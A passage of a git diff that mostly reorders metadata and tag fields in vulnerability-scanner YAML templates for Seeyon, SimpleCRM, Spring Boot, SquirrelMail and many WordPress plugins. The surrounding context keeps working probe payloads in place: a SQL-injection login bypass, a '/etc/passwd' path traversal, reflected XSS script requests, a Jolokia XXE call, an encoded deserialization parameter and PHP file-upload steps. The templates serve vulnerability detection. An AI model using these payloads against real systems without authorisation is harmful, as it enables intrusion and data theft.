b/http/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml index 04ebfc17cd..3c48990903 100644 --- a/http/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml +++ b/http/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml @@ -7,9 +7,9 @@ info: description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint. reference: - https://www.zhihuifly.com/t/topic/3345 - tags: zhiyuan,leak,disclosure,seeyon metadata: max-request: 1 + tags: zhiyuan,leak,disclosure,seeyon http: - method: GET @@ -18,7 +18,6 @@ http: matchers-condition: and matchers: - - type: word words: - "" diff --git a/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml b/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml index 627e7c65d2..69fe3ed563 100755 --- a/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml +++ b/http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml @@ -7,11 +7,10 @@ info: description: | Shiziyu CMS ApiController.class.php parameter filtering is not rigorous, resulting in SQL injection vulnerability. metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="/seller.php?s=/Public/login" tags: sqli - variables: num: "999999999" @@ -29,4 +28,4 @@ http: - type: status status: - - 404 \ No newline at end of file + - 404 diff --git a/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index b645b42031..aa4bb04c76 100644 --- a/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -9,16 +9,17 @@ info: - https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 - tags: packetstorm,sqli,simplecrm,auth-bypass,injection metadata: max-request: 1 + tags: packetstorm,sqli,simplecrm,auth-bypass,injection http: - method: POST path: - "{{BaseURL}}/scrm/crm/admin" + body: "email='+or+2>1+--+&password=&login=" matchers-condition: and diff --git a/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml b/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml index ccf41568e9..ee50d7d0f4 100644 --- a/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml +++ b/http/vulnerabilities/sitecore/sitecore-xml-xss.yaml @@ -10,8 +10,8 @@ info: - https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273 - https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: html:"Sitecore" tags: xss,sitecore,cms diff --git a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml index fd282f20bd..39a0cb34eb 100755 --- a/http/vulnerabilities/smartbi/smartbi-deserialization.yaml +++ b/http/vulnerabilities/smartbi/smartbi-deserialization.yaml @@ -11,9 +11,9 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/smartbi-windowunloading-other.yaml - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Smartbi%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: - fofa-query: app="SMARTBI" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="SMARTBI" tags: smartbi,deserialization http: @@ -31,6 +31,7 @@ http: - /vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -45,4 +46,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/splash/splash-render-ssrf.yaml b/http/vulnerabilities/splash/splash-render-ssrf.yaml index 638ed25031..ebad977ccf 100644 --- a/http/vulnerabilities/splash/splash-render-ssrf.yaml +++ b/http/vulnerabilities/splash/splash-render-ssrf.yaml @@ -8,8 +8,8 @@ info: - https://github.com/scrapinghub/splash - https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Splash" hunter-query: web.title="Splash" && header="TwistedWeb" tags: splash,ssrf,oast,oss diff --git a/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml b/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml index ecee0fa0eb..8770647b7b 100755 --- a/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml +++ b/http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/actuator/jolokia/list" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -30,4 +31,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/http/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index dd1fc9536d..8018d564e4 100644 --- a/http/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/http/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -4,14 +4,13 @@ info: name: Spring Boot Actuators (Jolokia) XXE author: dwisiswant0,ipanda severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its - own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. reference: - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - https://github.com/mpgn/Spring-Boot-Actuator-Exploit - tags: springboot,jolokia,xxe metadata: max-request: 2 + tags: springboot,jolokia,xxe http: - method: GET @@ -20,6 +19,7 @@ http: - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -32,4 +32,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml index f54644342f..55c5e21fe0 100644 --- a/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-h2-db-rce.yaml @@ -12,7 +12,7 @@ info: - https://github.com/spaceraccoon/spring-boot-actuator-h2-rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 metadata: max-request: 1 diff --git a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml index a08cbc39ff..1662310823 100644 --- a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -5,12 +5,12 @@ info: author: pdteam severity: critical description: Spring Boot is susceptible to remote code execution via Apache Log4j. + remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). reference: - https://logging.apache.org/log4j/2.x/security.html - https://www.lunasec.io/docs/blog/log4j-zero-day/ - https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later). classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 diff --git a/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml b/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml index 213f1ab3e3..91f9aaebc0 100644 --- a/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml +++ b/http/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: edb,xss,squirrelmail,plugin metadata: max-request: 1 + tags: edb,xss,squirrelmail,plugin http: - method: GET diff --git a/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml b/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml index fecd0db181..edc9783c07 100644 --- a/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml +++ b/http/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,squirrelmail,edb metadata: max-request: 2 + tags: lfi,squirrelmail,edb http: - method: GET @@ -22,9 +22,9 @@ http: - "{{BaseURL}}/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd" stop-at-first-match: true + matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" diff --git a/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml index ef7463ef5c..fba36e0719 100644 --- a/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml +++ b/http/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml @@ -11,10 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: xss,squirrelmail,plugin,edb metadata: max-request: 1 - + tags: xss,squirrelmail,plugin,edb variables: payload: "\"> HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml index 335272982c..813c92fb2e 100644 --- a/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml +++ b/http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml @@ -15,8 +15,8 @@ info: cvss-score: 8.8 cwe-id: CWE-434 metadata: - max-request: 2 verified: true + max-request: 2 tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint http: @@ -37,7 +37,6 @@ http: -----------------------------54331109111293931601238262353-- - - | GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/wordpress/404-to-301-xss.yaml b/http/vulnerabilities/wordpress/404-to-301-xss.yaml index c119760f90..6cbe066c3e 100644 --- a/http/vulnerabilities/wordpress/404-to-301-xss.yaml +++ b/http/vulnerabilities/wordpress/404-to-301-xss.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: wpscan,wp-plugin,xss,wp,wordpress,authenticated metadata: max-request: 2 + tags: wpscan,wp-plugin,xss,wp,wordpress,authenticated http: - raw: @@ -31,6 +31,7 @@ http: Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/ad-widget-lfi.yaml b/http/vulnerabilities/wordpress/ad-widget-lfi.yaml index eeffba6742..9cf9cc2931 100644 --- a/http/vulnerabilities/wordpress/ad-widget-lfi.yaml +++ b/http/vulnerabilities/wordpress/ad-widget-lfi.yaml @@ -14,9 +14,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wp,adWidget,wpscan metadata: max-request: 1 + tags: wordpress,wp-plugin,lfi,wp,adWidget,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml b/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml index dfef36e536..539ddfb3f6 100644 --- a/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml +++ b/http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml @@ -14,9 +14,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wp,accessmanager,wpscan metadata: max-request: 1 + tags: wordpress,wp-plugin,lfi,wp,accessmanager,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml index d16dd1f6be..2b67b02121 100644 --- a/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml +++ b/http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml @@ -6,13 +6,13 @@ info: severity: critical description: | The AJAX action abc_booking_getBookingResult, available to both authenticated and Unauthenticated users did not sanitise the calendarId parameter which was then concatenated to a SQL statement, leading an unauthenticated SQL injection issue. This could be used to retrieve information from the database, such as users' hashed password, username and email address. + remediation: Fixed in version 1.6.2 reference: - https://wpscan.com/vulnerability/bac7b590-70de-45b3-bdc2-19f90524ca39 - https://wordpress.org/plugins/advanced-booking-calendar/ - remediation: Fixed in version 1.6.2 metadata: - max-request: 1 verified: true + max-request: 1 tags: sqli,wpscan,wordpress,wp-plugin,wp,advanced-booking-calendar,unauthenticated http: diff --git a/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml b/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml index f79e3f9f8b..7c6d1b6828 100644 --- a/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/age-gate-open-redirect.yaml @@ -14,8 +14,8 @@ info: cvss-score: 6.1 cwe-id: CWE-601 metadata: - max-request: 1 verified: true + max-request: 1 tags: agegate,unauth,wpscan,packetstorm,wp-plugin,redirect,wordpress,wp http: @@ -24,9 +24,9 @@ http: - '{{BaseURL}}/wp-admin/admin-post.php' body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://interact.sh + headers: Content-Type: application/x-www-form-urlencoded - matchers: - type: regex part: header diff --git a/http/vulnerabilities/wordpress/age-gate-xss.yaml b/http/vulnerabilities/wordpress/age-gate-xss.yaml index 26a7a1c43c..bcae6397bf 100644 --- a/http/vulnerabilities/wordpress/age-gate-xss.yaml +++ b/http/vulnerabilities/wordpress/age-gate-xss.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 - tags: xss,authenticated,age-gate,wpscan,wordpress,wp-plugin,wp metadata: max-request: 2 + tags: xss,authenticated,age-gate,wpscan,wordpress,wp-plugin,wp http: - raw: @@ -25,12 +25,12 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=age-gate&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml index b0b7668940..b9f7492842 100644 --- a/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml +++ b/http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 9.8 cwe-id: CWE-434 - tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive metadata: max-request: 2 + tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive http: - raw: @@ -32,7 +32,6 @@ http: sep=; --------------------------ab360007dbae2de8-- - - | GET /wp-content/uploads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml b/http/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml index b10ad6e457..89ccab92e2 100644 --- a/http/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml +++ b/http/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml @@ -6,9 +6,9 @@ info: severity: low description: Searches for sensitive directories present in the alfacgiapi plugin. reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing metadata: max-request: 4 + tags: wordpress,listing http: - method: GET @@ -17,11 +17,13 @@ http: - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and matchers: - type: word words: - "Index of" + - type: word words: - "/wp-content/plugins/" @@ -29,6 +31,7 @@ http: - "/ALFA_DATA/alfacgiapi/" - "/cgi-bin/ALFA_DATA/alfacgiapi/" condition: or + - type: status status: - 200 diff --git a/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml b/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml index 23260049e4..37890e1edb 100644 --- a/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml +++ b/http/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wp-plugin,lfi,wp,edb,wordpress metadata: max-request: 1 + tags: wp-plugin,lfi,wp,edb,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml index fa3709a408..68eae9502e 100644 --- a/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml +++ b/http/vulnerabilities/wordpress/analytify-plugin-xss.yaml @@ -8,14 +8,14 @@ info: WordPress Analytify 4.2.1 does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5 - metadata: - max-request: 1 - verified: true - google-query: inurl:/wp-content/plugins/wp-analytify classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + metadata: + verified: true + max-request: 1 + google-query: inurl:/wp-content/plugins/wp-analytify tags: wp,wordpress,analytify,wpscan,wp-plugin,xss http: diff --git a/http/vulnerabilities/wordpress/aspose-file-download.yaml b/http/vulnerabilities/wordpress/aspose-file-download.yaml index 1844b6ad79..981a7e97df 100644 --- a/http/vulnerabilities/wordpress/aspose-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-file-download.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: aspose,ebook,wpscan,wordpress,wp-plugin,lfi metadata: max-request: 1 + tags: aspose,ebook,wpscan,wordpress,wp-plugin,lfi http: - method: GET diff --git a/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml b/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml index ebc2168b91..852ba737f2 100644 --- a/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml @@ -8,9 +8,9 @@ info: reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter - tags: aspose,packetstorm,wordpress,wp-plugin,lfi metadata: max-request: 1 + tags: aspose,packetstorm,wordpress,wp-plugin,lfi http: - method: GET diff --git a/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml index f7dc70394f..c6920b6ee5 100644 --- a/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-pdf-file-download.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: aspose,packetstorm,wordpress,wp-plugin,lfi metadata: max-request: 1 + tags: aspose,packetstorm,wordpress,wp-plugin,lfi http: - method: GET diff --git a/http/vulnerabilities/wordpress/aspose-words-file-download.yaml b/http/vulnerabilities/wordpress/aspose-words-file-download.yaml index f1dc7ba3c8..0ec1d44fd7 100644 --- a/http/vulnerabilities/wordpress/aspose-words-file-download.yaml +++ b/http/vulnerabilities/wordpress/aspose-words-file-download.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,aspose,wpscan metadata: max-request: 1 + tags: wordpress,wp-plugin,lfi,aspose,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index 5c2cdf900c..052c3f375d 100644 --- a/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: wordpress,wp-theme,redirect metadata: max-request: 1 + tags: wordpress,wp-theme,redirect http: - method: GET diff --git a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml index 9778469b8a..265f55cd9b 100644 --- a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml +++ b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml @@ -9,16 +9,15 @@ info: reference: - https://codevigilant.com/disclosure/wp-plugin-avchat-3-a3-cross-site-scripting-xss/ - https://wpscan.com/vulnerability/fce99c82-3958-4c17-88d3-6e8fa1a11e59 - metadata: - max-request: 1 - verified: true classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + metadata: + verified: true + max-request: 1 tags: xss,,wp,wpscan,wordpress,wp-plugin - http: - method: GET path: diff --git a/http/vulnerabilities/wordpress/booked-export-csv.yaml b/http/vulnerabilities/wordpress/booked-export-csv.yaml index 80263411cd..f472dd3d41 100644 --- a/http/vulnerabilities/wordpress/booked-export-csv.yaml +++ b/http/vulnerabilities/wordpress/booked-export-csv.yaml @@ -12,10 +12,10 @@ info: - http://boxyupdates.com/changelog.php?p=booked - https://wpscan.com/vulnerability/10107 metadata: - max-request: 1 verified: true - publicwww-query: "/wp-content/plugins/booked/" + max-request: 1 fofa-query: "wp-content/plugins/booked/" + publicwww-query: "/wp-content/plugins/booked/" google-query: inurl:"/wp-content/plugins/booked/" tags: wordpress,wpscan,wp-plugin,wp,booked,bypass diff --git a/http/vulnerabilities/wordpress/brandfolder-lfi.yaml b/http/vulnerabilities/wordpress/brandfolder-lfi.yaml index 372c40946e..47f4a9b81c 100644 --- a/http/vulnerabilities/wordpress/brandfolder-lfi.yaml +++ b/http/vulnerabilities/wordpress/brandfolder-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,rfi,edb,wordpress,wp-plugin metadata: max-request: 1 + tags: lfi,rfi,edb,wordpress,wp-plugin http: - method: GET diff --git a/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml index ea0ba2d3ad..295edfff24 100644 --- a/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/brandfolder-open-redirect.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.exploit-db.com/exploits/39591 - https://wpscan.com/vulnerability/f850e182-f9c6-4264-b2b1-e587447fe4b1 - tags: wp,brandfolder,edb,wpscan,wp-plugin,redirect,rfi,wordpress,lfi metadata: max-request: 1 + tags: wp,brandfolder,edb,wpscan,wp-plugin,redirect,rfi,wordpress,lfi http: - method: GET diff --git a/http/vulnerabilities/wordpress/calameo-publications-xss.yaml b/http/vulnerabilities/wordpress/calameo-publications-xss.yaml index e8482f84dc..4fac07a394 100644 --- a/http/vulnerabilities/wordpress/calameo-publications-xss.yaml +++ b/http/vulnerabilities/wordpress/calameo-publications-xss.yaml @@ -10,13 +10,13 @@ info: - https://codevigilant.com/disclosure/wp-plugin-athlon-manage-calameo-publications-a3-cross-site-scripting-xss/ - https://wpscan.com/vulnerability/83343eb3-bb4c-4b82-adf6-745882f872cc - https://wordpress.org/plugins/athlon-manage-calameo-publications/ - metadata: - max-request: 1 - verified: true classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + metadata: + verified: true + max-request: 1 tags: wordpress,wp-plugin,xss,wp,wpscan http: diff --git a/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml b/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml index 44871a1f47..4e3a87e2a2 100644 --- a/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml +++ b/http/vulnerabilities/wordpress/checkout-fields-manager-xss.yaml @@ -8,13 +8,13 @@ info: reference: - https://wpscan.com/vulnerability/ea617acd-348a-4060-a8bf-08ab3b569577 - https://wordpress.org/plugins/woocommerce-checkout-manager - metadata: - max-request: 2 - verified: true classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 + metadata: + verified: true + max-request: 2 tags: xss,wp,wordpress,authenticated,woocommerce,wpscan,wp-plugin http: @@ -32,6 +32,7 @@ http: Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/cherry-file-download.yaml b/http/vulnerabilities/wordpress/cherry-file-download.yaml index 3ebe7ca0d6..4aaa38309a 100644 --- a/http/vulnerabilities/wordpress/cherry-file-download.yaml +++ b/http/vulnerabilities/wordpress/cherry-file-download.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,wpscan metadata: max-request: 1 + tags: wordpress,wp-plugin,lfi,wpscan http: - method: GET diff --git a/http/vulnerabilities/wordpress/cherry-lfi.yaml b/http/vulnerabilities/wordpress/cherry-lfi.yaml index 05213085ee..d261d25053 100644 --- a/http/vulnerabilities/wordpress/cherry-lfi.yaml +++ b/http/vulnerabilities/wordpress/cherry-lfi.yaml @@ -4,8 +4,7 @@ info: name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download author: dhiyaneshDK severity: high - description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the - wp-config.php file. + description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. reference: - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE @@ -13,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - tags: wpscan,wordpress,wp-plugin,lfi,wp metadata: max-request: 1 + tags: wpscan,wordpress,wp-plugin,lfi,wp http: - method: GET diff --git a/http/vulnerabilities/wordpress/church-admin-lfi.yaml b/http/vulnerabilities/wordpress/church-admin-lfi.yaml index 341a3dc711..b2dafe33c8 100644 --- a/http/vulnerabilities/wordpress/church-admin-lfi.yaml +++ b/http/vulnerabilities/wordpress/church-admin-lfi.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: 